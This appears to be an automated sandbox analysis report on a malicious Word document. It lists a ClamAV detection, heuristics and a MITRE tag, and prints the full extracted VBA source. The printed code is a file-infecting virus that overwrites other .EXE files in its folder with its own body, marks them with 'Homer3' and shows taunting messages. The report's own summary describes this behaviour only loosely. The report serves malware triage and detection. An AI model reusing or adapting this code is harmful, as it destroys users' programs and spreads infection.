MALICIOUS
80
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a Microsoft Word document containing VBA macros. The macro code attempts to write a second-stage executable to disk and displays a fake critical information message to the user. The specific string 'Homer3' is appended to the file, likely as a marker or part of the payload.
Heuristics 2
-
ClamAV: Doc.Trojan.Green-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Green-2
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1651 bytes |
SHA-256: ccce358919e7f55a9d3a5428f4221e34ba235f596a3da506274408f0dc875a7f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Modul1" Option Explicit Dim erej() As Byte Dim zrtva As String Const velicina As Integer = 24576 Dim inf_znak As String Dim homer As String Private Sub Form_Load(): On Error Resume Next: GoTo a a: Dim Free: GoTo b b: Free = FreeFile: GoTo c c: Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free: GoTo d d: ReDim erej(velicina): GoTo e e: Get #1, 1, erej: GoTo f f: Close #Free: GoTo g h: While zrtva <> "": GoTo k g: zrtva = Dir(App.Path & "\" & "*.EXE"): GoTo h k: Open App.Path & "\" & zrtva For Binary Access Read As #Free: GoTo l l: homer = Strings.Space(LOF(Free)): GoTo o o: Get #1, 1, homer: GoTo p p: Close #Free: GoTo u u: inf_znak = Mid(homer, Len(homer)): GoTo z z: If Strings.LCase(inf_znak) <> "Homer3" Then: GoTo t t: Open App.Path & "\" & zrtva For Binary Access Write As #Free: GoTo r r: Put #1, , erej: GoTo w w: Put #1, , velicina: GoTo q q: Put #1, LOF(Free) + 6, "Homer3": GoTo s s: Close #Free: GoTo v v: zrtva = Dir(): GoTo n n: Wend If Day(Now()) = 7 Then MsgBox "Ja sam Homer Veliki-Qurac!", vbCritical, "| Critical Information |" If Month(Now()) = 7 Then MsgBox "Damn! AVP sux!", vbExclamation, "AVP = 0" 'HLLO.Homer_Tha_Pile 3 by e[ax] 'Greetz to all ppl on #virus 'Pozdravljam cijeli BiHNet.ORG '"My Dream Is My Reality" End If: End If End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.